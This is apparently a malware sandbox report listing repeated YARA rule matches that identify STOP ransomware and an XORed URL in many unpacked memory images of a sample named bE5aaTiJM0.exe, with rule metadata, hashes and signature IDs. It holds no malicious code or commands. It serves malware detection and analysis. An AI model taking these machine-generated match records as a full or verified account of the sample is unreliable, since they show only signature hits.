Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.bE5aaTiJM0.exe.42915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
